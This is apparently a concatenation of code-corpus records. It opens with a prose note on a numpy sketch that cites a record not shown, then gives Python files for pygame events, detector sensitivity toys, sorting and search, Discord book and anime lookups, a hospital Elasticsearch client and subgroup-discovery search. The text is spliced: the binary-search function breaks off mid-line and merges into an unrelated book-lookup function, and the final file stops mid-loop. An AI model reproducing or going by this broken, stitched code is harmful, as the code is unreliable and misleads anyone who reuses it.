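The gen_worker helper in the sch_sim.py record above caps each technician's dispatchable hours with nested np.where calls (min_hrs, then bdt_hrs). A minimal standalone sketch of that element-wise-minimum pattern follows; the three-worker frame and its values are invented for illustration and are not taken from the record:

import numpy as np
import pandas as pd

# Hypothetical workers frame mirroring the columns gen_worker builds.
workers = pd.DataFrame({
    'w_hrs':      [8, 4, 8],   # hours the worker is available
    'max_star_t': [4, 3, 8],   # cap implied by the worker's star rating
    'mdt':        [12, 0, 5],  # hours already assigned to the worker
})

# Same nested-np.where pattern as in the record: each step keeps the smaller value.
workers['min_hrs'] = np.where(workers.max_star_t < workers.w_hrs,
                              workers.max_star_t, workers.w_hrs)
workers['bdt_hrs'] = np.where(workers.mdt < workers.min_hrs,
                              workers.mdt, workers.min_hrs)

# The two np.where steps reduce to a running element-wise minimum.
assert (workers.bdt_hrs == np.minimum(
    workers.mdt, np.minimum(workers.max_star_t, workers.w_hrs))).all()

np.minimum expresses the same cap more directly; for these columns the nested np.where form used in the record behaves identically.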
+{"seq_id":"401455802","text":"#!/usr/bin/env python3\n# -*- utf-8 -*-\n#\n# http://eyehere.net/2011/python-pygame-novice-professional-2/\n#\n# Karl.Lv@outlook.com, KarlLv@126.com\n# 14 July, 2017\n#\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\n\nimport time\n\npygame.init()\n\nSCREEN_SIZE = (640, 480)\nscreen = pygame.display.set_mode(SCREEN_SIZE, 0, 32)\n\nfont = pygame.font.SysFont(\"dejavu-serif\", 16);\nfont_height = font.get_linesize()\n\nprint(\"font_height: \", font_height)\nevent_text = []\n\nwhile True:\n event = pygame.event.wait()\n event_text.append(str(event))\n event_text = event_text[-SCREEN_SIZE[1]//font_height:]\n\n if event.type == QUIT:\n exit()\n\n screen.fill((255, 127, 0))\n\n y = SCREEN_SIZE[1]-font_height\n\n for text in reversed(event_text):\n screen.blit(font.render(text, True, (0, 0, 0)), (0, y))\n\n y-=font_height\n\n pygame.display.update()\n\n","sub_path":"PythonPygame/python_pygame_2.py","file_name":"python_pygame_2.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60848400","text":"import numpy as np\nimport math,sys\n\nfrom detector import Detector, Component, define_detector\nfrom assay import Assay\nfrom facilities import HPGe\nimport toysens\n\nfrom ROOT import *\n\n# Units: \n# impurity: Bq/kg\n# mass: kg\n# livetime: s\n# rate: Hz\n\ndef main(ntoys, true_lambda, ncomp, spec_act, livetime, method, nsenstoys):\n\n # Define detector and its parts\n #comps = []\n #mass = 1 #per comp\n usetruth = (method == 'Truth')\n\n print('Arguments:')\n print('ntoys',ntoys)\n print('true_lambda',true_lambda)\n print('ncomp',ncomp)\n print('livetime',livetime)\n print('method',method)\n print('nsenstoys',nsenstoys)\n #print('mass',mass)\n\n det = define_detector(true_lambda, ncomp, spec_act, livetime)\n print('det',det)\n\n # Assay settings\n ge = HPGe(10./86400.)\n \n if usetruth:\n # True sensitivity -- Perfect knowledge of impurities\n ult_truth = det.truth()*livetime\n print('Ultimate true counts', ult_truth)\n for i in range(ntoys):\n true_sens, true_uls = toysens.calc_sens(det, method, livetime, nsenstoys, True)\n print('Sensitivity', true_sens)\n #print('Upperlimits', true_uls)\n #print('RMS', np.std(true_uls))\n #print_histo(true_uls)\n print\n \n else:\n # Sensitivity in real life -- Knowledge of impurities from imperfect assay\n for i in range(ntoys):\n \n # Assay campaign\n nlimits = 0\n for comp in det.components:\n comp.assay = Assay(ge.count(comp.trueimp,1,livetime=14*86400))\n if 'limit' in comp.assay.params.keys():\n nlimits += 1\n #print(det)\n \n sens, uls = toysens.calc_sens(det, method, livetime, nsenstoys, False)\n\n print('Sensitivity', sens, nlimits)\n #print('Upperlimits', uls)\n print\n\nif __name__ == '__main__':\n if len(sys.argv) < 8: \n print('See code for usage!')\n exit(0)\n\n ntoys = int(sys.argv[1])\n true_lambda = float(sys.argv[2])\n ncomp = int(sys.argv[3])\n spec_act = float(sys.argv[4])\n livetime = float(sys.argv[5])*86400*365\n method = sys.argv[6]\n nsenstoys = int(sys.argv[7])\n \n main(ntoys, true_lambda, ncomp, spec_act, livetime, method, nsenstoys)\n print('cache_size',len(toysens.fc_cache))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"402563507","text":"import time\r\nimport random\r\n\r\n# Adicionar as funções de Ordenamento e Pesquisa.\r\ndef 
semOrdenacao(lista):\r\n pass\r\n\r\ncompPesq= 0\r\ndef pesquisa_binaria(lista,item,E,D):\r\n compPesq= 0\r\n if (D 750:\n para = para[:750] + \"...\"\n date_ =\"\"\n if \"publishedDate\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n date_ = data[\"items\"][0][\"volumeInfo\"][\"publishedDate\"]\n authorlst=[]\n if \"authors\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n authorlst = data[\"items\"][0][\"volumeInfo\"][\"authors\"]\n author=\"\"\n for element in authorlst:\n author +=element + \", \"\n id_ = data[\"items\"][0][\"id\"]\n cover_image = \"https://www.messagetech.com/wp-content/themes/ml_mti/images/no-image.jpg\"\n if \"imageLinks\" in data[\"items\"][0][\"volumeInfo\"].keys():\n if \"thumbnail\" in data[\"items\"][0][\"volumeInfo\"][\"imageLinks\"].keys():\n cover_image = data[\"items\"][0][\"volumeInfo\"][\"imageLinks\"][\"thumbnail\"]\n url = \"http://books.google.com/books?id=\" + id_\n categorylst=[]\n if \"categories\" in data[\"items\"][0][\"volumeInfo\"].keys(): \n categorylst = data[\"items\"][0][\"volumeInfo\"][\"categories\"]\n categories=\"\"\n for element in categorylst:\n categories += element + \" \" \n content = \"\\n\" + para + \"\\n\\n\"\n stats = \"Author: \" + author + \"\\nPublishing Date: \" + date_ + \"\\nCategories: \" + categories\n embed = discord.Embed(\n title=title,\n url = url,\n description = content\n )\n embed.add_field(name=\"Information\", value = stats, inline = False)\n embed.set_thumbnail(url=cover_image)\n embed.set_footer(icon_url=auth.avatar.url, text=f\"Requested by {auth.name}\")\n return embed \n\ndef trace(q, author):\n api_url = \"https://api.trace.moe/search?url=\" + q\n response = requests.get(api_url)\n data_ = json.loads(response.text)\n if data_[\"error\"]:\n error = discord.Embed(\n title=\"Unable to trace\"\n )\n error.set_image(url = \"https://cdn.discordapp.com/attachments/637008973714817027/834462141267705976/remicry.gif\")\n return error\n id_ = data_[\"result\"][0][\"anilist\"]\n episode = str(data_[\"result\"][0][\"episode\"])\n temp = int(data_[\"result\"][0][\"from\"])\n stamp = time.strftime(\"%H:%M:%S\", time.gmtime(temp))\n content = \"Episode: \" + episode + \"\\nTimestamp: \" + stamp\n source_url = \"https://anilist.co/anime/\" + str(id_)\n query = '''\n query ($id: Int) { # Define which variables will be used in the query (id)\n Media (id: $id, type: ANIME) { # Insert our variables into the query arguments (search)\n title {\n romaji\n }\n coverImage{\n medium\n }\n\n }\n }\n '''\n variables = {\n 'id': id_\n }\n url = 'https://graphql.anilist.co'\n response = requests.post(url, json={'query': query, 'variables': variables})\n data = json.loads(response.text)\n title = data[\"data\"][\"Media\"][\"title\"][\"romaji\"]\n cover_image= data[\"data\"][\"Media\"][\"coverImage\"][\"medium\"]\n embed = discord.Embed(\n title=title,\n url=source_url,\n description = content,\n color = discord.Colour.red()\n )\n embed.set_thumbnail(url=cover_image)\n embed.set_footer(icon_url=author.avatar.url, text=f\"Requested by {author.name}\")\n return embed \n","sub_path":"others.py","file_name":"others.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"532880319","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*\n\n# 从ES服务器上获取数据信息\n\nimport os\nimport sys\ncur_path = os.path.abspath(os.path.dirname(__file__))\nroot_path = os.path.split(cur_path)[0]\nsys.path.append(root_path) # 项目路径添加到系统路径\nimport json\nimport time\nimport 
socket\nimport requests\nimport traceback\nfrom datetime import datetime\nfrom Utils.loadingConfigure import Properties\nfrom Utils.LogUtils import LogUtils\n\n\nclass GainESSearch(object):\n\n IS_INIT = False\n\n def __init__(self):\n if not GainESSearch.IS_INIT:\n self.parameters = Properties()\n self.logger = LogUtils().getLogger('es_search')\n self.log_info = \"\"\"hospital_code: [{0}], version: [{1}], serverip: [{2}], request_add: [{3}], request_data: [{4}],\n response_text: [{5}], response_code: [{6}], error_type: [{7}], error_content: [{8}], abnormal_info: [\\n{9}], take_times: [{10:.2f}]s\"\"\"\n es_host = self.parameters.properties.get('es_host')\n es_port = self.parameters.properties.get('es_port')\n self.hospital_code = self.parameters.properties.get('hospital_code')\n self.ver = self.parameters.properties.get('version')\n if es_port == '0':\n es_add = \"{}/search/bysy\".format(es_host)\n else:\n es_add = \"{}:{}\".format(es_host, es_port)\n self.id_add = 'http://{}/med/advanced/allVariableJilian.json'.format(es_add)\n self.record_add = 'http://{}/med/quality/getWenshuData.json'.format(es_add)\n self.record_list_add = 'http://{}/med/advanced/query/patients.json'.format(es_add)\n GainESSearch.IS_INIT = True\n\n def __new__(cls, *args, **kwargs):\n \"\"\"\n 单例模式\n \"\"\"\n if not hasattr(cls, 'instance'):\n cls.instance = super(GainESSearch, cls).__new__(cls)\n return cls.instance\n\n def _requestMethod(self, url, data, start_time, input_info):\n res = {'res_flag': False}\n r = requests.post(url, data=data, timeout=5)\n if r.status_code != 200:\n r = requests.post(url, data=data, timeout=5)\n try:\n result = r.json()\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info() # sys.exc_info(),返回有关由except捕获的最近异常的信息\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, url, data, r.text, r.status_code,\n exc_type.__name__, exc_value, abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['input_data'] = input_info\n res['request_add'] = url\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n res['res_flag'] = True\n res['response_time'] = time_cost\n res.update(result)\n return res\n\n def getId(self, expression):\n start_time = time.time()\n res = dict()\n res['result'] = set()\n res['res_flag'] = False\n data = {\n 'expressions': expression,\n \"page\": \"0\",\n \"size\": \"10\",\n \"result\": [[{\"exp\": \"等于\", \"field\": \"住院病案首页_就诊信息_就诊次数\", \"flag\": \"1\", \"unit\": \"\", \"values\": []}]]\n }\n r = requests.post(self.id_add, data=json.dumps(data))\n if r.status_code == 200:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n else:\n r = requests.post(self.id_add, data=json.dumps(data))\n try:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info()\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.id_add, data, r.text, r.status_code,\n exc_type.__name__, exc_value, 
abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['expression'] = expression\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n if 'result' in result:\n res['res_flag'] = True\n res['response_time'] = time_cost\n if isinstance(result.get('result'), list):\n for one_batch in result['result']:\n keys = set(one_batch.keys())\n res['result'].update(keys)\n if 'Count' in result:\n count = int(result['Count'])\n if count != len(res['result']):\n res['count'] = len(res['result'])\n self.logger.warning('\\nCount: {}\\nlength: {}'.format(count, len(res), ))\n else:\n res['count'] = count\n else:\n res['error_info'] = 'No \"result\" in result...'\n\n if not res['res_flag']:\n res.update(result)\n res['error_source'] = 'es'\n res['expression'] = expression\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n 'res_flag is False', res, 'getId', time.time()-start_time)\n self.logger.warning(info)\n return res\n\n def getRecord(self, record_id, record_name, is_src=False):\n start_time = time.time()\n res = dict()\n res['res_flag'] = False\n data = {\n 'esId': record_id,\n 'wenshuName': record_name,\n 'isSrc': is_src\n }\n r = requests.post(self.record_add, data=data)\n if r.status_code == 200:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n else:\n r = requests.post(self.record_add, data=data)\n try:\n result = json.loads(r.text)\n time_cost = r.elapsed.total_seconds()\n except:\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n exc_type, exc_value, exc_traceback_obj = sys.exc_info()\n abnormal_info = ''.join(traceback.format_tb(exc_traceback_obj))\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n exc_type.__name__, exc_value, abnormal_info, time.time()-start_time)\n self.logger.error(info)\n res['error_source'] = 'es'\n res['record_id'] = record_id\n res['record_name'] = record_name\n res['response_status'] = r.status_code\n res['response_text'] = r.text\n res['error_type'] = exc_type.__name__\n res['error_info'] = '.'.join(exc_value.args)\n res['abnormal_info'] = ''.join(traceback.format_tb(exc_traceback_obj))\n return res\n if result.get(record_id):\n res = json.loads(result.get(record_id))\n res['res_flag'] = True\n res['response_time'] = time_cost\n if not res['res_flag']:\n res.update(result)\n res['error_source'] = 'es'\n res['record_id'] = record_id\n res['record_name'] = record_name\n HOST_NAME = socket.gethostname()\n HOST_IP = socket.gethostbyname(HOST_NAME)\n info = self.log_info.format(self.hospital_code, self.ver, HOST_IP, self.record_add, data, r.text, r.status_code,\n 'res_flag is False', res, 'getRecord', time.time()-start_time)\n self.logger.warning(info)\n return res\n\n def getRecordQuickly(self, patient_id, visit_id, record_name, record_type='2', is_src=False):\n \"\"\"\n 快速获取文书,type: 1表示门诊,2表示住院\n \"\"\"\n record_id = '{}##{}#{}#{}'.format(self.hospital_code, record_type, patient_id, visit_id)\n return self.getRecord(record_id, record_name, is_src)\n\n def getEsIdByDate(self, start_date='', end_date=''):\n \"\"\"\n 按患者出院起止时间, 获取患者es查询ID\n \"\"\"\n result = dict()\n result['result'] 
= list()\n expression = list()\n if start_date and not end_date:\n # 有起始日期,没有结束日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [start_date]}]]\n if end_date and not start_date:\n # 有结束日期,没有起始日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \"<\", \"flag\": \"or\", \"unit\": \"\", \"values\": [end_date]}]]\n if start_date and end_date:\n # 有起始日期,也有结束日期\n expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [start_date]}],\n [{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \"<\", \"flag\": \"or\", \"unit\": \"\", \"values\": [end_date]}]]\n if not expression:\n return {'res_flag': False, 'info': 'No \"start_date\" or \"end_date\" in input para...'}\n es_result = self.getId(expression)\n if not es_result.get('res_flag'):\n return es_result\n result['res_flag'] = True\n result['result'] = list(es_result['result'])\n result['count'] = len(result['result'])\n return result\n\n def getPatientRecordList(self, patient_id, visit_id, record_type='2'):\n start_time = time.time()\n record_id = '{}##{}#{}#{}'.format(self.hospital_code, record_type, patient_id, visit_id)\n data = {\n 'expressions': [[{\"field\": \"fieldId\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [record_id]}]],\n \"page\": \"0\",\n \"size\": \"10\",\n \"resultField\": [\"文档列表_文档名\"]\n }\n para = json.dumps(data)\n result = self._requestMethod(url=self.record_list_add, data=para, start_time=start_time, input_info=para)\n if not result.get('total'):\n result['res_flag'] = False\n return result\n if isinstance(result.get('hits'), list) and len(result.get('hits')) > 0:\n tmp = result['hits'][0]\n if isinstance(tmp, list) and len(tmp) > 0:\n res_tmp = tmp[0]\n if isinstance(res_tmp, dict) and isinstance(res_tmp.get('文档列表_文档名'), str):\n res_list = res_tmp.get('文档列表_文档名').split(',')\n result['result'] = res_list\n result.pop('hits')\n return result\n result['res_flag'] = False\n return result\n\n\nif __name__ == '__main__':\n app = GainESSearch()\n expression = [[{\"field\": \"住院病案首页_就诊信息_患者标识\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"000052934000\"]}],\n [{\"field\": \"住院病案首页_就诊信息_就诊次数\", \"exp\": \"=\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"4\"]}]]\n # expression = [[{\"field\": \"住院病案首页_就诊信息_出院时间\", \"exp\": \">\", \"flag\": \"or\", \"unit\": \"\", \"values\": [\"2016-01-01\"]}]]\n t1 = datetime.now()\n # result = app.getId(expression)\n result = app.getPatientRecordList('000052934000', '4')\n # for i in result:\n # app.getRecord(i, 'binganshouye')\n # result = app.getRecord('BJDXDSYY##2#000665705900#1', 'yizhu')\n t = (datetime.now()-t1).total_seconds()\n print(json.dumps(result, ensure_ascii=False, indent=4))\n print('函数运行消耗 {0} 秒'.format(t))\n","sub_path":"Utils/gainESSearch.py","file_name":"gainESSearch.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521288","text":"import pandas as pd\nfrom itertools import combinations, chain\nfrom math import factorial\nfrom tqdm import tqdm\nimport numpy as np\nfrom heapq import heappush, heappop\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport random\nimport glob\nimport os\nimport pickle\nimport argparse\n# def readData():\n# features = pd.read_csv(\"data/features.csv\")\n# features = features.iloc[:,:-5]\n# clinicalData 
=pd.read_excel(\"data/ClinicalData.xlsx\")\n# features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# features=features.set_index(\"index\")\n# return features\n\n\n# def readData():\n# header= list(range(1,101))\n# header2 = [str(x) for x in header]\n# features = pd.read_csv(\"data/X.csv\", header=None , names=header2)\n# outcome = pd.read_csv(\"data/Y.csv\", header=None, names=[\"outcome\"])\n# result = pd.concat([features, outcome], axis=1, sort=False)\n# # features = features.iloc[:,:-5]\n# # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n# # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# # features=features.set_index(\"index\")\n# return result\n\n\n\n# def readData():\n# data_root= \"data3_toy\"\n\n# # header= list(range(0,100))\n# header= list(range(0,4))\n# header2 = [str(x) for x in header]\n# features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n# outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n# result = pd.concat([features, outcome], axis=1, sort=False)\n\n# feat_score= pd.read_csv(\"{}/S1.csv\".format(data_root), header=None)\n# feat_similarity= pd.read_csv(\"{}/S2.csv\".format(data_root), header=None)\n# # feat_similarity = 1-feat_dissimilarity\n# feat_similarity = np.array(feat_similarity)\n# # features = features.iloc[:,:-5]\n# # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n# # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n# # features=features.set_index(\"index\")\n# X=result.iloc[:,:-1]\n# Y=result.iloc[:,-1:]\n# return [X, Y, feat_score, feat_similarity]\n\n\ndef getNumberOfFeatuers(data_root):\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None)\n return features.shape[1]\n\ndef readData():\n print(\"reading data...\")\n data_root= \"sim_data_dec22/3\"\n features_num = getNumberOfFeatuers(data_root)\n # header= list(range(0,100))\n header= list(range(0,features_num))\n header2 = [str(x) for x in header]\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n result = pd.concat([features, outcome], axis=1, sort=False)\n\n feat_score= pd.read_csv(\"{}/V.csv\".format(data_root), header=None)\n feat_similarity= pd.read_csv(\"{}/W.csv\".format(data_root), header=None)\n # feat_similarity = 1-feat_dissimilarity\n feat_similarity = np.array(feat_similarity)\n # features = features.iloc[:,:-5]\n # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n # features=features.set_index(\"index\")\n X=result.iloc[:,:-1]\n Y=result.iloc[:,-1:]\n return [X, Y, feat_score, feat_similarity]\n\n\n# def readTrueCases(path):\n \n# with open(path, \"r\") as f:\n# line = f.readline()\n# tokens = line.split(\",\")\n# selectors = []\n# for token in tokens:\n# sel = sgd.EquitySelector(\"814\",1)\n# soi = sgd.Conjuction([sgd.EquitySelector(\"814\",1)])\n\n\ndef readData_sim(path, return_true_causes=False):\n print(\"reading data...\")\n data_root= path\n features_num = getNumberOfFeatuers(data_root)\n # header= list(range(0,100))\n header= list(range(0,features_num))\n header2 = [str(x) for x in header]\n features = pd.read_csv(\"{}/X.csv\".format(data_root), header=None , names=header2)\n outcome = pd.read_csv(\"{}/Y.csv\".format(data_root), header=None, names=[\"outcome\"])\n result = pd.concat([features, outcome], axis=1, sort=False)\n\n feat_score= 
pd.read_csv(\"{}/V.csv\".format(data_root), header=None)\n feat_similarity= pd.read_csv(\"{}/W.csv\".format(data_root), header=None)\n # feat_similarity = 1-feat_dissimilarity\n feat_similarity = np.array(feat_similarity)\n # features = features.iloc[:,:-5]\n # clinicalData =pd.read_excel(\"data/ClinicalData.xlsx\")\n # features[\"outcome\"] = clinicalData[\"Cardiotoxicity\"]\n # features=features.set_index(\"index\")\n X=result.iloc[:,:-1]\n Y=result.iloc[:,-1:]\n\n if return_true_causes==True:\n print(\"11111111\")\n with open(\"{}/true_causes.csv\".format(path)) as f:\n true_causes= []\n for line in f:\n tokens = line.split(\",\")\n sels = []\n feature_ids_matlab = []\n for t in tokens:\n if not RepresentsInt(t):\n continue\n feature_ids_matlab.append(int(t.strip())) \n feature_ids_matlab = np.unique(feature_ids_matlab)\n for feature_id_matlab in feature_ids_matlab:\n sels.append(EquitySelector(str(feature_id_matlab-1),1))\n true_causes.append(Conjuction(sels))\n\n if return_true_causes==True:\n return [X, Y, feat_score, feat_similarity, true_causes]\n else: \n return [X, Y, feat_score, feat_similarity]\n\ndef RepresentsInt(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\nclass EquitySelector():\n\n def __init__(self, attribute, value):\n self.attribute = attribute\n self.value = value\n\n def __eq__(self, other):\n return repr(self) == repr(other)\n\n def __hash__(self):\n return hash(repr(self))\n\n def covers(self, data):\n column_data = data[self.attribute].to_numpy()\n if pd.isnull(self.value):\n return pd.isnull(column_data)\n return column_data == self.value\n\n def __repr__(self):\n query=\"\"\n if np.isnan(self.value):\n query = self.attribute + \".isnull()\"\n else:\n query = str(self.attribute) + \"==\" + str(self.value)\n return query \n\n def __lt__(self, other):\n return repr(self) < repr(other)\n\n# class BinaryTarget():\n# def __init__(self, attribute, value):\n# self.attribute = attribute\n# self.value = value\n\ndef createTarget(attribute, value):\n selector = EquitySelector(attribute, value)\n return selector\n\n\ndef createSelectors(data, ignore=[]):\n selectors = []\n original_features = []\n sg_to_index = {}\n counter=0\n for attr_name in [x for x in data if x not in ignore]:\n for val in np.sort(pd.unique(data[attr_name])):\n selector = EquitySelector(attr_name, val)\n selectors.append(selector)\n original_features.append(int(attr_name))\n sg_to_index[selector] = counter\n counter=counter+1\n return [selectors, original_features, sg_to_index] \n\n\ndef createSearchSpace(selectors, depth):\n def binomial(x, y):\n try:\n binom = factorial(x) // factorial(y) // factorial(x - y)\n except ValueError:\n binom = 0\n return binom\n searchSpace = chain.from_iterable(combinations(selectors, r) for r in range(1, depth + 1))\n length = sum(binomial(len(selectors), k) for k in range(1, depth + 1))\n return [searchSpace, length]\n\n\nclass Conjuction:\n def __init__(self, selectors):\n self.selectors = selectors\n\n def __eq__(self, other):\n return repr(self) == repr(other)\n\n def __hash__(self):\n return hash(repr(self))\n\n def covers(self, data):\n # empty description ==> return a list of all '1's\n if not self.selectors:\n return np.full(len(data), True, dtype=bool)\n # non-empty description\n return np.all([sel.covers(data) for sel in self.selectors], axis=0)\n\n\n def __repr__(self, open_brackets=\"\", closing_brackets=\"\", and_term=\" AND \"):\n attrs = sorted(str(sel) for sel in self.selectors)\n return \"\".join((open_brackets, 
and_term.join(attrs), closing_brackets))\n\n def __lt__(self, other):\n return repr(self) < repr(other)\n\n\ndef add_if_required(result, sg, quality, result_set_size, check_for_duplicates=False): \n if check_for_duplicates and (quality, sg) in result:\n print(\"duplicated found\")\n return\n\n sg_set = convertSGtoSet(sg)\n for pair in result:\n beam_quality = pair[0]\n sg_beam = pair[1]\n sg_beam_set = convertSGtoSet(sg_beam)\n subtract = sg_beam_set - sg_set\n if len(subtract)==0 and quality < beam_quality:\n # print(\"Found a subset with better score! Not added\")\n return\n\n if len(result) < result_set_size:\n heappush(result, (quality, sg))\n elif quality > result[0][0]:\n heappop(result)\n heappush(result, (quality, sg))\n\ndef computeScore(sg_vector, outcome_vector, measure):\n n=len(sg_vector)\n sg_vector = sg_vector.astype(int)\n outcome_vector = outcome_vector.astype(int)\n tab = pd.crosstab(sg_vector,outcome_vector)\n \n if not 1 in tab.index: \n tab.loc[1]=0\n\n\n TP= n11 = tab.loc[1][1]\n FP= n10 = tab.loc[1][0]\n FN= n01 = tab.loc[0][1]\n TN= n00 = tab.loc[0][0]\n N= tab.loc[0][0]+tab.loc[0][1]\n P= tab.loc[1][0]+tab.loc[1][1]\n F= tab.loc[0][0]+tab.loc[1][0]\n T= tab.loc[0][1]+tab.loc[1][1]\n\n e=1\n if measure==\"accuracy\":\n quality = (n11+n00)/n\n elif measure==\"oddsRatio\":\n quality = (n00*n11)/(n10*n01)\n elif measure==\"colligation\":\n quality= ( n11*n00 - n10*n01 )/( n11*n00 + n10*n01 + e )\n elif measure==\"goodman\":\n quality = 1- ((min(n11,n10)+min(n00,n01))/(min(n01,n10)))\n elif measure==\"f1\":\n quality = (2*n11)/(n10+n01)\n elif measure == \"new\":\n quality = ((TP*TN)-(FP*FN))/(np.sqrt(T*F*P*N)+e)\n return quality\n\ndef computeQuality(X, Y, measure=\"\"):\n X = X.astype(int)\n Y = Y.astype(int)\n tab = pd.crosstab(X,Y)\n # print(tab)\n if not 1 in tab.index: \n tab.loc[1]=0\n if not 0 in tab.index: \n tab.loc[0]=0 \n\n tab = tab+1\n TP= n11 = tab.loc[1][1]\n FP= n10 = tab.loc[1][0]\n FN= n01 = tab.loc[0][1]\n TN= n00 = tab.loc[0][0]\n N= n0b=tab.loc[0][0]+tab.loc[0][1]\n P= n1b= tab.loc[1][0]+tab.loc[1][1]\n F= nb0= tab.loc[0][0]+tab.loc[1][0]\n T= nb1=tab.loc[0][1]+tab.loc[1][1]\n # print(\"{}*{} - {}*{}\".format(n11,n00,n10,n01))\n # print(\"{}*{} - {}*{}\".format(n1b,n0b,nb1,nb0))\n quality= ( n11*n00 - n10*n01 )/np.sqrt( n1b*n0b * nb1*nb0)\n return np.abs(quality)\n\n\ndef simpleSearch(target, selectors, data, measure):\n searchSpace = createSearchSpace(selectors,2)\n # print (searchSpace[1])\n # searchSpace = searchSpace[0]\n # print(type(searchSpace))\n tqdm_searchSpace = tqdm(searchSpace[0],total=searchSpace[1])\n result = []\n for i, selectors_one_point in enumerate(tqdm_searchSpace):\n sg = Conjuction(selectors_one_point)\n sg_vector = sg.covers(data)\n outcome_vector = target.covers(data)\n quality = computeScore(sg_vector, outcome_vector, measure)\n # result.append((quality,selectors_one_point))\n add_if_required(result, sg, quality, 10)\n return result\n\n\ndef beamSearch(target, selectors, data, measure, max_depth=2, beam_width=5, result_set_size=5):\n beam = [(0, Conjuction([]))]\n last_beam = None\n\n depth = 0\n while beam != last_beam and depth < max_depth:\n last_beam = beam.copy()\n print(\"last_beam size: {}, depth: {}\".format(len(last_beam), depth))\n for (_, last_sg) in last_beam:\n if not getattr(last_sg, 'visited', False):\n setattr(last_sg, 'visited', True)\n for sel in tqdm(selectors):\n # create a clone\n new_selectors = list(last_sg.selectors)\n if sel not in new_selectors:\n new_selectors.append(sel)\n sg = 
Conjuction(new_selectors)\n sg_vector = sg.covers(data)\n outcome_vector = target.covers (data)\n quality = computeScore(sg_vector, outcome_vector, measure)\n add_if_required(beam, sg, quality, beam_width, check_for_duplicates=True)\n depth += 1\n\n result = beam[:result_set_size]\n result.sort(key=lambda x: x[0], reverse=True)\n return result\n\n\n\n\n\ndef main():\n data=readData()\n target=createTarget(\"outcome\",True)\n selectors = createSelectors(data,[\"outcome\"])\n with open(\"result.txt\",\"w\") as f:\n for measure in [\"accuracy\", \"oddsRatio\", \"colligation\", \"goodman\", \"f1\"]:\n f.write(measure)\n f.write(\"\\n\")\n result = simpleSearch(target, selectors, data, measure)\n for r in result:\n f.write(\"\\t\"+str(r))\n f.write(\"\\n\")\n f.write(\"\\n\")\n print(\"end finished\")\n return result\n\n\ndef main_beam():\n data=readData()\n target=createTarget(\"outcome\",True)\n selectors = createSelectors(data,[\"outcome\"])\n with open(\"result_beam.txt\",\"w\") as f:\n for measure in [\"colligation\"]:\n f.write(measure)\n f.write(\"\\n\")\n result = beamSearch(target, selectors, data, measure)\n for r in 